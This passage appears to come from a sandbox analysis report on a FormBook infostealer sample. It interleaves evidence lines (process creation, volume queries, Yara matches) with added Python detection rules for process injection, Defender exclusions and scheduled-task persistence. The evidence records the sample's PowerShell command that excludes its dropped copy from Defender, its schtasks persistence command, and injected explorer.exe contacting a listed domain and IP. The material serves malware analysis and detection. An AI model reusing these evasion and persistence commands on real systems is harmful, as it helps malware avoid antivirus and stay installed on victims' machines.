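                label = "thread hijacking in running process"
            else:
                label = None
            if label:
                _note(findings, key, label)
        # APC injection needs no ResumeThread: the target thread runs the APC the
        # next time it enters an alertable wait, so flag it as soon as it is complete.
        if st.wrote and st.exec_region and st.apc_queued:
            _note(findings, key, "APC injection into running process")
    return dict(findings)


# Constructed event stream (pids invented) shaped like the report's behaviour:
# 100 = vbc.exe, 200 = help.exe (spawned suspended), 300 = explorer.exe (already running),
# 400/500 = a benign parent/child pair that only uses CREATE_SUSPENDED.
SAMPLE_EVENTS = [
    {"src": 100, "dst": 200, "api": "CreateProcess", "flags": CREATE_SUSPENDED},
    {"src": 100, "dst": 200, "api": "NtUnmapViewOfSection"},
    {"src": 100, "dst": 200, "api": "VirtualAllocEx", "protect": PAGE_EXECUTE_READWRITE},
    {"src": 100, "dst": 200, "api": "WriteProcessMemory"},
    {"src": 100, "dst": 200, "api": "SetThreadContext"},
    {"src": 100, "dst": 200, "api": "ResumeThread"},
    {"src": 100, "dst": 300, "api": "VirtualAllocEx", "protect": PAGE_EXECUTE_READWRITE},
    {"src": 100, "dst": 300, "api": "WriteProcessMemory"},
    {"src": 100, "dst": 300, "api": "QueueUserAPC"},
    {"src": 200, "dst": 300, "api": "NtMapViewOfSection", "protect": PAGE_EXECUTE_READWRITE},
    {"src": 200, "dst": 300, "api": "SetThreadContext"},
    {"src": 200, "dst": 300, "api": "ResumeThread"},
    {"src": 400, "dst": 500, "api": "CreateProcess", "flags": CREATE_SUSPENDED},
    {"src": 400, "dst": 500, "api": "ResumeThread"},
]

if __name__ == "__main__":
    for (src, dst), labels in correlate(SAMPLE_EVENTS).items():
        print(f"{src} -> {dst}: {', '.join(labels)}")
```

The benign 400/500 pair shows why CREATE_SUSPENDED on its own is not a signal (installers and debuggers do it constantly); the label is only emitted once a writable-then-executable region and a thread redirect have both been observed against the same target.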
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\Desktop\vbc.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uZlkYhlkeLeaKC.exe"
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\vbc.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uZlkYhlkeLeaKC.exe"
Source: C:\Users\user\Desktop\vbc.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uZlkYhlkeLeaKC" /XML "C:\Users\user\AppData\Local\Temp\tmpAA68.tmp"
Source: C:\Users\user\Desktop\vbc.exe Process created: C:\Users\user\Desktop\vbc.exe C:\Users\user\Desktop\vbc.exe
Source: explorer.exe, 0000000B.00000000.302023782.0000000001400000.00000002.00020000.sdmp, help.exe, 00000014.00000002.515690504.0000000005240000.00000002.00020000.sdmp Binary or memory string: uProgram Manager
Source: explorer.exe, 0000000B.00000000.305520960.0000000005F40000.00000004.00000001.sdmp, help.exe, 00000014.00000002.515690504.0000000005240000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000B.00000000.302023782.0000000001400000.00000002.00020000.sdmp, help.exe, 00000014.00000002.515690504.0000000005240000.00000002.00020000.sdmp Binary or memory string: Progman
Source: explorer.exe, 0000000B.00000000.266771972.0000000000EB8000.00000004.00000020.sdmp Binary or memory string: ProgmanX
Source: explorer.exe, 0000000B.00000000.302023782.0000000001400000.00000002.00020000.sdmp, help.exe, 00000014.00000002.515690504.0000000005240000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 0000000B.00000000.310145026.0000000008ACF000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWndAj
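Three of the evasion and persistence behaviours in this section are visible from process command lines and network telemetry alone: the PowerShell Add-MpPreference call that excludes the dropped copy under AppData\Roaming from Defender scanning, the schtasks /Create that registers the "Updates\uZlkYhlkeLeaKC" task from an XML file in the user's Temp directory, and explorer.exe issuing DNS queries and port-80 connections to the listed domains after the injection. The Python below is an added example, not part of this report, of triage rules over such events. The event dicts, their field names, the firefox.exe path and the notepad.exe line are constructed for the example; the two malicious command lines and the domain and IP are taken from the evidence above.

```python
import re

# Patterns over Windows command lines and paths (case-insensitive, backslashes escaped).
DEFENDER_EXCLUSION = re.compile(r"Add-MpPreference\b.*?-Exclusion(Path|Process|Extension)\b", re.I)
SCHTASKS_XML = re.compile(r'/create\b.*?/xml\s+"?([^"]+)', re.I)
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\(AppData|Desktop|Documents|Downloads)\\", re.I)
TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\", re.I)

# Shell and helper binaries that have no business issuing their own DNS lookups or
# plain-HTTP connections; a hit here is the "system process connects to network" case.
NO_DIRECT_NETWORK = {"explorer.exe", "help.exe"}


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def triage(proc_events, net_events):
    """Return a list of findings, one dict per matched rule, in event order."""
    findings = []
    for ev in proc_events:
        name = _basename(ev["image"])
        cmd = ev["cmdline"]
        if name == "powershell.exe" and DEFENDER_EXCLUSION.search(cmd):
            # Excluding a user-writable path is how the dropped copy stays unscanned.
            severity = "high" if USER_WRITABLE.search(cmd) else "medium"
            findings.append({"rule": "defender_exclusion_added", "severity": severity,
                             "parent": ev["parent"], "cmdline": cmd})
        elif name == "schtasks.exe":
            m = SCHTASKS_XML.search(cmd)
            if m and TEMP_DIR.search(m.group(1)):
                # Task definitions written to %TEMP% right before registration are
                # a dropper pattern; legitimate installers ship theirs with the package.
                findings.append({"rule": "schtasks_from_temp_xml", "severity": "high",
                                 "parent": ev["parent"], "xml": m.group(1)})
    for ev in net_events:
        if _basename(ev["image"]) in NO_DIRECT_NETWORK:
            findings.append({"rule": "system_process_network", "severity": "medium",
                             "image": ev["image"], ev["kind"]: ev["value"]})
    return findings


# Constructed events modelled on the report's evidence lines.
PROC_EVENTS = [
    {"parent": r"C:\Users\user\Desktop\vbc.exe",
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference '
                r'-ExclusionPath "C:\Users\user\AppData\Roaming\uZlkYhlkeLeaKC.exe"'},
    {"parent": r"C:\Users\user\Desktop\vbc.exe",
     "image": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmdline": r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uZlkYhlkeLeaKC" '
                r'/XML "C:\Users\user\AppData\Local\Temp\tmpAA68.tmp"'},
    {"parent": r"C:\Windows\explorer.exe",          # benign user-launched process
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r'"C:\Windows\System32\notepad.exe"'},
]
NET_EVENTS = [
    {"image": r"C:\Windows\explorer.exe", "kind": "dns", "value": "www.miabellavita.com"},
    {"image": r"C:\Windows\explorer.exe", "kind": "connect", "value": "44.227.65.245:80"},
    {"image": r"C:\Program Files\Mozilla Firefox\firefox.exe",   # browser traffic: expected
     "kind": "connect", "value": "104.21.4.114:80"},
]

if __name__ == "__main__":
    for f in triage(PROC_EVENTS, NET_EVENTS):
        print(f["severity"], f["rule"], f)
```

explorer.exe does reach the network on its own in some configurations (shell features that use WinHTTP), so in production the last rule is best scoped to plain HTTP towards domains outside the allow-list, or correlated with the injection evidence above rather than raised on its own.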

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Users\user\Desktop\vbc.exe VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match File source: 8.0.vbc.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.vbc.exe.3bfcd00.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.vbc.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.vbc.exe.3bb72e0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.343817848.00000000012F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.261930236.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.261342946.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.513280768.0000000002B40000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.264514879.0000000003AA9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.512917942.0000000002A40000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.511655958.0000000000270000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.343872613.0000000001320000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.296889219.000000000E75A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.312766069.000000000E75A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.342880104.0000000000400000.00000040.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook
Source: Yara match File source: 8.0.vbc.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.vbc.exe.3bfcd00.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.vbc.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.vbc.exe.3bb72e0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.343817848.00000000012F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.261930236.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.261342946.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.513280768.0000000002B40000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.264514879.0000000003AA9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.512917942.0000000002A40000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.511655958.0000000000270000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.343872613.0000000001320000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.296889219.000000000E75A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.312766069.000000000E75A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.342880104.0000000000400000.00000040.00000001.sdmp, type: MEMORY